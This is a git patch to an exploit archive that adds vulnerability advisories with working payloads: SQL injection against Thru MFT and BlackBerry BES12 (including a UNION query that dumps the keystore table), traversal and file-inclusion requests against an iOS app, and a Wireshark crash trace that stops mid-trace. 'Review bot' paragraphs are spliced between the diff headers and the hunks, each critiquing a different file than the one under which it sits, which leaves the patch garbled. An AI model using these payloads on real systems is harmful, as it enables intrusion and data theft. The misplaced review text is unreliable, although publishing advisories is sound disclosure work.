From f7b61997677e7c0d2689b418854935f4207d4550 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 23 Feb 2016 05:02:07 +0000
Subject: [PATCH] DB: 2016-02-23 7 new exploits

---
 files.csv | 7 +
 platforms/asp/webapps/39485.txt | 126 +++++++++++++
 platforms/ios/webapps/39479.txt | 298 +++++++++++++++++++++++++++++++
 platforms/java/webapps/39481.txt | 149 ++++++++++++++++
 platforms/multiple/dos/39482.txt | 98 ++++++++++
 platforms/multiple/dos/39483.txt | 74 ++++++++
 platforms/multiple/dos/39484.txt | 141 +++++++++++++++
 platforms/windows/local/39480.py | 77 ++++++++
 8 files changed, 970 insertions(+)
 create mode 100755 platforms/asp/webapps/39485.txt
 create mode 100755 platforms/ios/webapps/39479.txt
 create mode 100755 platforms/java/webapps/39481.txt
 create mode 100755 platforms/multiple/dos/39482.txt
 create mode 100755 platforms/multiple/dos/39483.txt
 create mode 100755 platforms/multiple/dos/39484.txt
 create mode 100755 platforms/windows/local/39480.py

diff --git a/files.csv b/files.csv
index 1674a21f4..49020e8fd 100755
--- a/files.csv
+++ b/files.csv
@@ -33631,6 +33631,7 @@ id,file,description,date,author,platform,type,port
 37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
+39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0
 37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
 37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
 37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
@@ -35716,3 +35717,9 @@ id,file,description,date,author,platform,type,port
 39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
 39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
 39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability",2016-02-20,"Saeed reza Zamanian",php,webapps,0
+39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow PoC",2016-02-22,INSECT.B,windows,local,0
+39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0
+39482,platforms/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
+39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
+39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
+39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
diff --git a/platforms/asp/webapps/39485.txt b/platforms/asp/webapps/39485.txt
new file mode 100755
index 000000000..b4e51d06d
--- /dev/null
+++ b/platforms/asp/webapps/39485.txt
@@ -0,0 +1,126 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Advisory ID: SYSS-2015-056
+Product: Thru Managed File Transfer Portal
+Manufacturer: Thru
+Affected Version(s): 9.0.2
+Tested Version(s): 9.0.2
+Vulnerability Type: SQL Injection (CWE-89)
+Risk Level: High
+Solution Status: Open
+Manufacturer Notification: 2015-10-28
+Solution Date: 2016-01-22
+Public Disclosure: 2016-02-15
+CVE Reference: Not yet assigned
+Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
+ (SySS GmbH)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Overview:
+
+Thru Managed File Transfer Portal is a web based file transfer application.
+According to the Thru website [1], the application aims to offload large
+file transfer to a single platform, to protect files, to replace FTP
+servers and to allow access to files anytime, anywhere.
+
+An SQL injection vulnerability was identified in one of the GET request.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Vulnerability Details:
+
+The SQL injection vulnerability was found in a GET request that causes
+contact data to be sorted. At least the attribute values of sortorder
+and letterrange are not correctly sanitized and therefore can be abused
+to inject arbitrary SQL statements.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Proof of Concept (PoC):
+
+The following HTTP request can be used to show that the SQL statement
+causing a delay is executed and results in a 500 server error:
+
+GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
+Host: [HOST]
+Cookie: [COOKIES]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Solution:
+
+The reported security vulnerability has been fixed in a new software
+release. Update to the new software version.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Disclosure Timeline:
+
+2015-10-27: Vulnerability discovered
+2015-10-28: Vulnerability reported to manufacturer
+2016-01-22: Manufacturer announced update
+2016-02-15: Public release of security advisory
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+References:
+
+[1] Thru Homepage
+ http://www.thruinc.com
+[2] SySS Security Advisory SYSS-2015-056
+ https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
+[3] SySS Responsible Disclosure Policy
+ https://www.syss.de/en/news/responsible-disclosure-policy/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Credits:
+
+This security vulnerability was found by Dr. Erlijn van Genuchten and
+Danny Österreicher of the SySS GmbH.
+
+E-Mail: erlijn.vangenuchten@syss.de
+Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
+Key ID: 0xBD96FF2A
+Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
+
+E-Mail: danny.oesterreicher@syss.de
+Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
+Key ID: 0x96029AC7
+Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Disclaimer:
+
+The information provided in this security advisory is provided "as is"
+and without warranty of any kind. Details of this security advisory may
+be updated in order to provide as accurate information as possible. The
+latest version of this security advisory is available on the SySS Web
+site.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Copyright:
+
+Creative Commons - Attribution (by) - Version 3.0
+URL: http://creativecommons.org/licenses/by/3.0/deed.en
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1
+
+iQIcBAEBCgAGBQJWwbbpAAoJEAylhje9lv8qAh4P/1yg6xg5xHvvnh2Al1fy/ley
+rABwBv9YmcNhNLASrxPOXGBx6rcuCc5zEdOI62PKv4E19VMcjOvwHw5MzfP/4GDu
+LAAku71zIn6YCxYF1NKScyqDeBg6OZfHiW6EP/ufhFD+pzu0FySmj2G3/lflloEX
+FBNHzNURGakWizxzaNbnnltI3DuxPss3E67crJMHEPtXUw0dVrQAeMtsyc46708z
+pWh1JAvNNIlqyyQwyy3EOvQtOIkYd8SMmayla2CUpl0xC5On5GcxkqvaZcqyScR9
+s4rxVS8x7akGDGS/F2aFM2zEfCL5DAXVCoRWTyKYqcMYINdZY3xuREcG3iOXVMrp
+yRYBg6dgwf3QHRmCrkZLlKx6hibHG13dRykD7LPcO3H+q81Ll4T/6OuHqbHbPjD2
+EeOqW+bKDn//TKrsUbwvaM/1hF96T66QLRvUeTGHbMoNjN3fQTTqdBaYHq8ROiD8
+Xc1ybVxgxUMKi+3WEvOw5aYF6Q/RN9Z4WN2p88+MLrBRFCh6nHT0jPKZFyxZuooi
+b3MI/qPawWO4HfpjvunCdNGo49I34JCcAsi2Um8qzM/aedbUaH1dqj6sZW4j8bA2
+WzwXgwnLXQ+wON/tCDz8Q4NfZWbDG2v1anJBOTIgABjLAeuo0nDaBYonyp4lY/Og
+4UaL7kboaGGj3mRINLd8
+=df2e
+-----END PGP SIGNATURE-----
\ No newline at end of file
diff --git a/platforms/ios/webapps/39479.txt b/platforms/ios/webapps/39479.txt
new file mode 100755
index 000000000..228f3296d
--- /dev/null
+++ b/platforms/ios/webapps/39479.txt
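Review bot: The metadata block contradicts the Solution section — `Solution Status: Open` sits beside `Solution Date: 2016-01-22` and a Solution paragraph stating the issue "has been fixed in a new software release", and no fixed version is ever named, so a reader cannot tell whether 9.0.2 is the last vulnerable build; the status line should read `Solution Status: Fixed` and the Solution paragraph should name the release that closes SYSS-2015-056. The PoC is a stacked, time-based payload (`;WAITFOR+DELAY+'0:0:5'--`), so the verification signal that matters is the roughly five-second response delay, not the 500 status the text leads with — an application that merely errors on the stray quote has not been shown to execute the injected statement, while one that does delay has been shown to run attacker-supplied stacked statements on what is evidently Microsoft SQL Server. The request carries `Cookie: [COOKIES]`, which suggests an authenticated session is needed, yet the required privilege level is never stated; that caveat belongs next to `Risk Level: High`. `letterrange` is listed as injectable but has no proof-of-concept, so it should either get one or be marked as untested.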
@@ -0,0 +1,298 @@
+Document Title:
+===============
+InstantCoder v1.0 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1738
+
+
+Release Date:
+=============
+2016-02-22
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1738
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Product & Service Introduction:
+===============================
+You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible
+for your to code and debug web apps on your lovely iPhone and iPad.
+
+(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-02-22: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Shumin Sun
+Product: InstantCoder - iOS (Web-Application) 1.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
+The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
+commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `./toolkit/upload` module.
Remote attackers are able to inject own
+files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local
+file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to
+inject the lfi payload by usage of the wifi interface or local file sync function.
+
+Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
+attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
+
+The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
+Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
+
+Request Method(s):
+ [+] [POST]
+
+Vulnerable Module(s):
+ [+] ./toolkit/upload
+
+Vulnerable Parameter(s):
+ [+] filename
+
+Affected Module(s):
+ [+] Index File Dir Listing (http://localhost:8080/)
+
+
+
+1.2
+A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
+The vulnerability allows remote attackers to unauthorized access path variables to compromise the web-application or mobile device.
+
+The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to
+manipulate the path variable GET or POST method request to compromise the application. The request method to inject the payload is
+POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application-side. The path
+variable is not encoded or parsed.
Thus allows an attacker to inject to unauthorized access the local system or app path.
+
+The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account.
+Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components.
+
+
+Request Method(s):
+ [+] [POST]
+
+Vulnerable Module(s):
+ [+] ./listFiles
+
+Vulnerable Parameter(s):
+ [+] path
+
+Affected Module(s):
+ [+] Index File Dir Listing (http://localhost:8080/)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Payload
+http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!]
+
+
+PoC: Vulnerable Source
+javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]");
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Content-Length[819]
+ Content-Type[multipart/form-data; boundary=---------------------------29343138867419]
+ Connection[keep-alive]
+ POST-Daten:
+ POST_DATA[-----------------------------29343138867419
+Content-Disposition: form-data; name="path"
+-----------------------------29343138867419
+Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
+Content-Type: image/png
+-
+Status: 200[OK]
+GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Connection[keep-alive]
+ Cache-Control[max-age=0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[4995]
+ Date[Mon, 22 Feb 2016 08:33:04 GMT]
+
+
+Reference(s):
+http://localhost:8080/toolkit/upload
+http://localhost:8080/toolkit/index.html
+
+
+
+1.2
+Thedirectory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Payload
+http://localhost:8080/listFiles?path=./.././../../../../../../../../../../
+
+
+PoC: Vulnerable Source
+

+
+
+
+
+
+Status: 200[OK]
+POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Connection[keep-alive]
+ Content-Length[0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[162]
+ Date[Mon, 22 Feb 2016 08:09:34 GMT]
+-
+Status: 200[OK]
+POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Connection[keep-alive]
+ Content-Length[0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[2]
+ Date[Mon, 22 Feb 2016 08:09:37 GMT]
+-
+Status: 200[OK]
+POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Connection[keep-alive]
+ Content-Length[0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[2]
+ 
Date[Mon, 22 Feb 2016 08:09:45 GMT]
+
+
+Reference(s):
+http://localhost:8080/listFiles
+
+
+Security Risk:
+==============
+1.1
+The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7)
+
+1.2
+The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/java/webapps/39481.txt b/platforms/java/webapps/39481.txt
new file mode 100755
index 000000000..49d1beb19
--- /dev/null
+++ b/platforms/java/webapps/39481.txt
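Review bot: The directory-traversal proof does not show what the text claims — every logged `POST /listFiles?path=...` reply, including the `/.././../../../../../../../../../../etc/%00` request, comes back with `Content-Length[2]`, and no response body is printed, so nothing in the session log evidences a listing from outside the application container; the advisory should include the body returned for the traversal request, or present the finding as an unvalidated `path` parameter rather than a confirmed traversal. The severity numbers disagree with one another: the header says CVSS `7`, the technical details give `6.4` and `7.0`, and the Security Risk section gives `6.7` and `7.0`; each issue needs one score with its vector. `Exploitation Technique: Remote` overstates the attacker model for a service the PoC reaches at `localhost:8080` and that the text itself conditions on "wifi panel access" — an adjacent-network peer on the same Wi-Fi, not an Internet attacker — and the header should say so. The "local file include" PoC is an upload whose only payload is `filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"`, tied in the text to the index listing and a `changePath()` call; no file content is shown being read or executed, so the stated impact of "mobile application compromise" is not supported by what is logged.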
@@ -0,0 +1,149 @@
+( , ) (,
+ . '.' ) ('. ',
+ ). , ('. ( ) (
+ (_,) .'), ) _ _,
+ / _____/ / _ \ ____ ____ _____
+ \____ \==/ /_\ \ _/ ___\/ _ \ / \
+ / \/ | \\ \__( <_> ) Y Y \
+/______ /\___|__ / \___ >____/|__|_| /
+ \/ \/.-. \/ \/:wq
+ (x.0)
+ '=.|w|.='
+ _=''"''=.
+
+ presents..
+
+BlackBerry Enterprise Service 12 (BES12) Self-Service
+Affected versions: BES12 < 12.4
+
+CVE: CVE-2016-1914 and CVE-2016-1915
+
+PDF:
+http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+
+
++-----------+
+|Description|
++-----------+
+
+Blackberry BES12 is an enterprise mobile management solution and
+contains a self-service web application available to mobile users. This
+web application contains multiple vulnerabilities including
+unauthenticated SQL
+injection and reflected cross site scripting.
+
+Limited access to an on-premise BES12 environment was provided during
+the discovery of these vulnerabilities. The full impact of the
+vulnerabilities in relation to compromising other portions of the BES12
+solution, such as mobile devices, is unclear.
+
+
++------------+
+|Exploitation|
++------------+
+
+*SQL Injection*
+
+The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
+injection via the imageName parameter. This servlet is exposed at
+multiple paths and is used to fetch an image from the database:
+
+/mydevice/client/image
+/admin/client/image
+/myapps/client/image
+/ssam/client/image
+/all/client/image
+
+
+This was discovered on a production BES12 on-premise deployment and the
+injection vector allowed both UNION and stacked queries to be executed
+on the Microsoft SQL server used by BES12. This allows full read/write
+access to the database, and can potentially result in command execution
+via xp_cmdshell depending on the database user configuration.
+
+The following proof of concept demonstrates an injection payload which
+will select the entire obj_keystore_entry table.
The query will
+serialise the entire table into an XML document which is returned in the
+HTTP response as UTF-16 without the leading BOM (byte order mark)
+causing most text editors to fail to display the response correctly.
+
+https:///mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
+
+The technique above can be used to download any database table available
+to the BES12 database user.
+
+Notable database tables are:
+* obj_user which contains BES12 user details.
+* obj_user_authentication which contains authentication tokens.
+* obj_user_device which based on column names, contains enrolment
+tokens, enrolment secrets and device encryption keys.
+
+It is unclear if this information is sufficient to decrypt a lost/stolen
+BES12 mobile device.
+
+
+*Reflected Cross Site Scripting*
+
+Two areas of the self-service web application exist where user-supplied
+input is reflected directly in web pages, allowing a malicious user to
+conduct Cross Site Scripting (XSS) attacks against users of the
+application. While the application uses the HttpOnly cookie flag for
+session tokens, successful exploitation allows malicious JavaScript to
+perform any action within the application that the targeted user is able
+to. The administrative web application is typically hosted on the same
+domain and may be attacked using these XSS vectors, although this is
+BES12 deployment specific.
+
+The table below details where Cross Site Scripting was detected and
+which parameters are vulnerable:
+
+https:///mydevice/index.jsp?locale=">
+https:///mydevice/loggedOut.jsp?locale=">
+
+
++----------+
+| Solution |
++----------+
+
+
+Upgrade to BES12.4.
+
+
++-------------------+
+|Disclosure Timeline|
++-------------------+
+
+
+Initial disclosure to Blackberry – 19 Nov 2015
+Disclosure receipt confirmed by Blackberry – 19 Nov 2015
+Request for update from Blackberry – 7 Dec 2015
+Vulnerabilities confirmed by Blackberry – 8 Dec 2015
+Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016
+BES12.4 released – 29 Jan 2016
+Advisory released – 15 Feb 2016
+
+
++-----------------------------+
+|About Security-Assessment.com|
++-----------------------------+
+
+
+Security-Assessment.com is a leading team of Information Security
+consultants specialising in providing high quality Information Security
+services to clients throughout the Asia Pacific region. Our clients
+include some of the largest globally recognised companies in areas such
+as finance, telecommunications, broadcasting, legal and government. Our
+aim is to provide the very best independent advice and a high level of
+technical expertise while creating long and lasting professional
+relationships with our clients.
+Security-Assessment.com is committed to security research and
+development, and its team continues to identify and responsibly publish
+vulnerabilities in public and private software vendor's products.
+Members of the Security-Assessment.com R&D team are globally recognised
+through their release of whitepapers and presentations related to new
+security research.
+
+For further information on this issue or any of our service offerings,
+contact us:
+Web www.security-assessment.com
+Email info@security-assessment.com
diff --git a/platforms/multiple/dos/39482.txt b/platforms/multiple/dos/39482.txt
new file mode 100755
index 000000000..070f433de
--- /dev/null
+++ b/platforms/multiple/dos/39482.txt
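Review bot: Both reflected-XSS proof-of-concept lines are truncated to `https:///mydevice/index.jsp?locale=">` and `https:///mydevice/loggedOut.jsp?locale=">` — the tag that followed the `">` has evidently been stripped along with the rest of the markup, and the `https:///` host slot is empty in every PoC URL, so none of them reproduce as printed; they should carry an explicit `[HOST]` placeholder and the payload as a percent-encoded string, e.g. `locale=%22%3E%3Cscript%3E...%3C/script%3E`, or be described in words. The UNION payload against `com.rim.mdm.ui.server.ImageServlet` hard-codes five `NULL` columns ahead of the `FOR XML PATH('')` subquery, so the column count is specific to the schema the authors tested; a one-line caveat that the count may need adjusting on other 12.x builds would spare readers a false negative. The description says injection is unauthenticated and the text later notes stacked queries reach Microsoft SQL Server with a possible `xp_cmdshell` path, but `/admin/client/image` appears in the exposed-path list without comment — it is worth stating whether that path was confirmed reachable without an admin session, since that changes the blast radius for operators triaging before the BES12.4 upgrade. The `obj_user_device` claim is properly hedged as "based on column names"; the sentence about decrypting a lost device is hedged the same way and should stay so.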
@@ -0,0 +1,98 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=656
+
+The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688
+READ of size 4 at 0x7f72db15e078 thread T0
+ #0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17
+ #1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11
+ #2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13
+ #3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9
+ #8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5
+ #9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
+ #10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
+ #14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
+ #15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
+ #16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
+ #17 0x7f72cf121cc1 in call_dissector_through_handle
